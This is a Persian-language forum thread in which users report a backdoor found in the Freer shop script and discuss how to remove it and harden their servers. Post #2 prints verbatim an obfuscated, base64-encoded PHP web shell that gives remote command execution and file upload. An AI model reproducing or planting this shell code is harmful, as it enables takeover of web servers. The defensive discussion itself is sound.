-
January 25th, 2016, 00:36
#1
مشکل جالب در فریرر
ویرایش توسط saeid1346 : February 4th, 2016 در ساعت 20:20
-
-
January 25th, 2016 00:36
# ADS
-
February 4th, 2016, 15:36
#2
پاسخ : مشکل جالب در فریرر
نوشته اصلی توسط
saeid1346
سلام دوستان
از شما تقاضا دارم اخرین نسخه اسکریپت فریر رو از این سایت که به ظاهر معتبره دانلود کنید
http://freer.ir/virtual/download.php
این مسیر رو پیدا کنید
include/libs/smarty/sysplugins/
فایل
smarty_intemplateparser.php رو باز کنید
و اگر صلاح میدونید توضیحی ارائه بدید بابت این کد پایین !!!!
ویرایش شد...
با این که این قضیه گزارش شده بود بهشون ولی هنوز اصلاح نشده و تاریخ اصلاح فایل 9/1/2016 هستش !!!!
هنوزم چند فایل دیگه مثل این داخل اسکریپت هست
البته شاید سایت این بنده خدا هک شده باشه ولی به هر حال یه شخصی داره سو استفاده میکنه.
کد PHP:
<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApO3NldF9tYWdpY19xdW90ZXNfcnVudGltZSgwKTtzZXNzaW9uX3N0YXJ0KCk7DQokYmxhY2s9JzhmNzU4YmNhZWNmMjkxMDllOGQzMGVhYmJkZGEzOWU2JzsNCmlmKG1kNSgkX1JFUVVFU1RbJ2JsYWNrJ10pPT0kYmxhY2sgb3IgJF9TRVNTSU9OWydsb2dpbiddPT0nMScpew0KJF9TRVNTSU9OWydsb2dpbiddPScxJzsNCmlmKCRfUkVRVUVTVFsnZXZhbCddKXtldmFsKCRfUkVRVUVTVFsnZXZhbCddKTt9aWYoJF9SRVFVRVNUWydkbCddKXt1bmxpbmsoZ2V0Y3dkKCkuRElSRUNUT1JZX1NFUEFSQVRPUi4kX1JFUVVFU1RbJ2RsJ10pO30NCmlmKHN0cnRvbG93ZXIoc3Vic3RyKFBIUF9PUywgMCwgMykpID09ICJ3aW4iKXskcz0iXFwiO31lbHNleyRzPSIvIjt9JGFkPSRfUkVRVUVTVFsnYWQnXTsNCmlmICgkYWQpe2NoZGlyKCRhZCk7fWVsc2V7JGFkPWdldGN3ZCgpO31pZiAoJF9GSUxFU1siZmYiXSl7bW92ZV91cGxvYWRlZF9maWxlKCRfRklMRVNbImZmIl1bInRtcF9uYW1lIl0sICRfRklMRVNbImZmIl1bIm5hbWUiXSk7fQ0KaWYgKCRociA9IG9wZW5kaXIoJGFkKSkge3doaWxlKCRmID0gcmVhZGRpcigkaHIpKXtpZihpc19kaXIoJGYpKXskZGY9JGRmLiRmLicNCic7fWVsc2V7JGxmPSRsZi4kZi4nDQonO319Y2xvc2VkaXIoJGhyKTt9JGZvcm09Jzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9Z2V0Pic7ZWNobyAnPGNlbnRlcj48dGV4dGFyZWEgY29scz05MCByb3dzPTIwPic7aWYoJF9HRVRbJ2NtZSddKXtwYXNzdGhydSgkX0dFVFsnY21lJ10pO31lbHNle2VjaG8gJGRmLiRsZjt9O2VjaG8nPC90ZXh0YXJlYT4nLiRmb3JtLidDaGFuZ2UgRGlyIDogPGlucHV0IG5hbWU9YWQgc2l6ZT01MCB2YWx1ZT0nLmdldGN3ZCgpLiRzLic+PGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPUdvPjwvZm9ybT4nLiRmb3JtLidDb21tYW5kIEV4ZWN1dGUgOiA8aW5wdXQgbmFtZT1jbWUgc2l6ZT01MCB2YWx1ZT1pZD4gPGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPWVYZWN1dGU+PC9mb3JtPjxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9cG9zdCBlbmN0eXBlPW11bHRpcGFydC9mb3JtLWRhdGE+VXBsb2FkIDogPGlucHV0IHNpemU9NTAgdHlwZT1maWxlIG5hbWU9ZmYgPiA8aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1hZCB2YWx1ZT0nLmdldGN3ZCgpLic+PGlucHV0IHR5cGU9c3VibWl0IHZhbHVlPVNlbmQ+PC9mb3JtPic7DQp9')); ?>
- - - Updated - - -
http://forum.iranphp.org/Thread-%D9%...-virtual-freer
خدمت شما
از سایت فریر دانلود کردم
فایل smarty_internal_templateparser.php دقیق بررسی کردم
کلمه base64_decode حتی پیدا نشد
-
-
February 4th, 2016, 16:36
#3
عضو انجمن
پاسخ : مشکل جالب در فریرر
نوشته اصلی توسط
ata3929
از سایت فریر دانلود کردم
فایل smarty_internal_templateparser.php دقیق بررسی کردم
کلمه base64_decode حتی پیدا نشد
من هم با این روش هک مشابه برخوردکرده ام ولی در خود فایل اصلی موردی نیست؛
دیکد:
http://codepad.org/uLGMnrpc
ویرایش توسط yastheme : February 4th, 2016 در ساعت 16:42
█ سنترال هاستینگ - اولین سرویس دهنده DDoS Protected ایرانی!
█ شرکت ایمن میزبان راهبر کاسپین (شماره ثبت : 1799 شناسه ملی: 14006354907 )
-
-
February 4th, 2016, 20:20
#4
-
-
February 5th, 2016, 12:32
#5
-
-
February 17th, 2016, 19:50
#6
عضو انجمن
پاسخ : مشکل جالب در فریرر
ظاهرا این یه مشکل جدیه؛ تو سایت های زیادی دیده شده این مشکل !
این نشون دهنده اینه واقعا فریر یک اسکریپت امن دیگه نمی تونه باشه.
زمانی که کاربر در پنل خود فعالیت هایی مثل مشاهده دسته بندی ها یا ساخت دسته بندی جدید دارد یک سری فایل با نام category_20-up.php
در مسیر زیر می سازد:
www.site.com/statics/upload/
این فایل های شل دسترسی کامل به هاست را می دهد؛
با حذف کد هایی که در انتهای فایل smarty_internal_templateparser.php اضافه شدهو جدیدا در سایتهای زیادی دیده می شود مشکل را برطرف کنید، البته مشکل کامل برطرف نمی شود؛
همیشه امکان وجود شل های دیگر است؛
اما این شل ها در پوشه هایی هستند که نیاز به اجرای PHP توسط کاربر در آن آدرس از طریق مرورگر نیست !
یک فایل .htaccess بسازید و کد زیر را در آن قرار دهید:
کد PHP:
<FilesMatch "\.(?i:php)$">
<IfModule !mod_authz_core.c>
Order allow,deny
Deny from all
</IfModule>
<IfModule mod_authz_core.c>
Require all denied
</IfModule>
</FilesMatch>
این فایل .htaccess را در فولدر های زیر قرار دهید:
include
statics
templates
فایل های فولدر plugins و صفحه اصلی را هم بررسی کنید که کد مخربی وجود نداشته باشد ( تعداد فایل ها محدود است و سریع قابل بررسی است )
█ سنترال هاستینگ - اولین سرویس دهنده DDoS Protected ایرانی!
█ شرکت ایمن میزبان راهبر کاسپین (شماره ثبت : 1799 شناسه ملی: 14006354907 )
-
تعداد تشکر ها از yastheme به دلیل پست مفید
-
February 17th, 2016, 19:58
#7
پاسخ : مشکل جالب در فریرر
نوشته اصلی توسط
yastheme
ظاهرا این یه مشکل جدیه؛ تو سایت های زیادی دیده شده این مشکل !
این نشون دهنده اینه واقعا فریر یک اسکریپت امن دیگه نمی تونه باشه.
زمانی که کاربر در پنل خود فعالیت هایی مثل مشاهده دسته بندی ها یا ساخت دسته بندی جدید دارد یک سری فایل با نام category_20-up.php
در مسیر زیر می سازد:
www.site.com/statics/upload/
این فایل های شل دسترسی کامل به هاست را می دهد؛
با حذف کد هایی که در انتهای فایل smarty_internal_templateparser.php اضافه شدهو جدیدا در سایتهای زیادی دیده می شود مشکل را برطرف کنید، البته مشکل کامل برطرف نمی شود؛
همیشه امکان وجود شل های دیگر است؛
اما این شل ها در پوشه هایی هستند که نیاز به اجرای PHP توسط کاربر در آن آدرس از طریق مرورگر نیست !
یک فایل .htaccess بسازید و کد زیر را در آن قرار دهید:
کد PHP:
<FilesMatch "\.(?i:php)$">
<IfModule !mod_authz_core.c>
Order allow,deny
Deny from all
</IfModule>
<IfModule mod_authz_core.c>
Require all denied
</IfModule>
</FilesMatch>
این فایل .htaccess را در فولدر های زیر قرار دهید:
include
statics
templates
فایل های فولدر plugins و صفحه اصلی را هم بررسی کنید که کد مخربی وجود نداشته باشد ( تعداد فایل ها محدود است و سریع قابل بررسی است )
ممنون از توضیحات خوبتون
من اون مسیر و که گفته بودم بررسی کردم همچین فایلی ایجاد میشه
و سوالی که دارم دقیقا این کد چه کاری میکنه ؟ ( میشه دقیق توضیح بدین عملکرد این کد )
-
-
February 17th, 2016, 20:17
#8
عضو انجمن
پاسخ : مشکل جالب در فریرر
نوشته اصلی توسط
ata3929
ممنون از توضیحات خوبتون
من اون مسیر و که گفته بودم بررسی کردم همچین فایلی ایجاد میشه
و سوالی که دارم دقیقا این کد چه کاری میکنه ؟ ( میشه دقیق توضیح بدین عملکرد این کد )
به هکر ها اجازه آپلود هر گونه فایل مخرب را می دهد،
█ سنترال هاستینگ - اولین سرویس دهنده DDoS Protected ایرانی!
█ شرکت ایمن میزبان راهبر کاسپین (شماره ثبت : 1799 شناسه ملی: 14006354907 )
-
-
February 18th, 2016, 09:45
#9
عضو انجمن
پاسخ : مشکل جالب در فریرر
نوشته اصلی توسط
yastheme
ظاهرا این یه مشکل جدیه؛ تو سایت های زیادی دیده شده این مشکل !
این نشون دهنده اینه واقعا فریر یک اسکریپت امن دیگه نمی تونه باشه.
زمانی که کاربر در پنل خود فعالیت هایی مثل مشاهده دسته بندی ها یا ساخت دسته بندی جدید دارد یک سری فایل با نام category_20-up.php
در مسیر زیر می سازد:
www.site.com/statics/upload/
این فایل های شل دسترسی کامل به هاست را می دهد؛
با حذف کد هایی که در انتهای فایل smarty_internal_templateparser.php اضافه شدهو جدیدا در سایتهای زیادی دیده می شود مشکل را برطرف کنید، البته مشکل کامل برطرف نمی شود؛
همیشه امکان وجود شل های دیگر است؛
اما این شل ها در پوشه هایی هستند که نیاز به اجرای PHP توسط کاربر در آن آدرس از طریق مرورگر نیست !
یک فایل .htaccess بسازید و کد زیر را در آن قرار دهید:
کد PHP:
<FilesMatch "\.(?i:php)$">
<IfModule !mod_authz_core.c>
Order allow,deny
Deny from all
</IfModule>
<IfModule mod_authz_core.c>
Require all denied
</IfModule>
</FilesMatch>
این فایل .htaccess را در فولدر های زیر قرار دهید:
include
statics
templates
فایل های فولدر plugins و صفحه اصلی را هم بررسی کنید که کد مخربی وجود نداشته باشد ( تعداد فایل ها محدود است و سریع قابل بررسی است )
مشکل جدیدی نیست .
هکر به هر طریقی به مدیریت دسترسی داشته باشد از قسمت آپلود عکس برای دسته یا محصولات این کار را به سادگی میتواند انجام دهد.
از این موارد گذشته جدیدا در اخباری که از سایت اصلی لود میکند فایل جاوا اسکریپتی لود میشود که به صورت مخفیانه iframe می سازد و احتمالا ***یدن کوکی و ...
پیشنهاد میکنم پیکج امن کننده را استفاده کنید چون باگ های دیگری هم وجود دارد ...
http://www.softiran.org/view-item/97...safe-pack.html
-
تعداد تشکر ها از us12 به دلیل پست مفید
-
February 27th, 2016, 12:47
#10
پاسخ : مشکل جالب در فریرر
فایل smarty_internal_templateparser.php برای من تو اون مسیر اصلا وجود نداره!!
- - - Updated - - -
نوشته اصلی توسط
us12
مشکل جدیدی نیست .
هکر به هر طریقی به مدیریت دسترسی داشته باشد از قسمت آپلود عکس برای دسته یا محصولات این کار را به سادگی میتواند انجام دهد.
از این موارد گذشته جدیدا در اخباری که از سایت اصلی لود میکند فایل جاوا اسکریپتی لود میشود که به صورت مخفیانه iframe می سازد و احتمالا ***یدن کوکی و ...
پیشنهاد میکنم پیکج امن کننده را استفاده کنید چون باگ های دیگری هم وجود دارد ...
http://www.softiran.org/view-item/97...safe-pack.html
راهنمای نصب این پکیج رو هم بگید تو سایت اصلی چیزی ننوشته
-
من دهنم سرویس شد هرکاری میکردم هاستم اجازه اپلود 1.58 فرییر رو نمیداد ارور شل base64 میزد
مجوز های ارسال و ویرایش
پاسخ با نقل قول
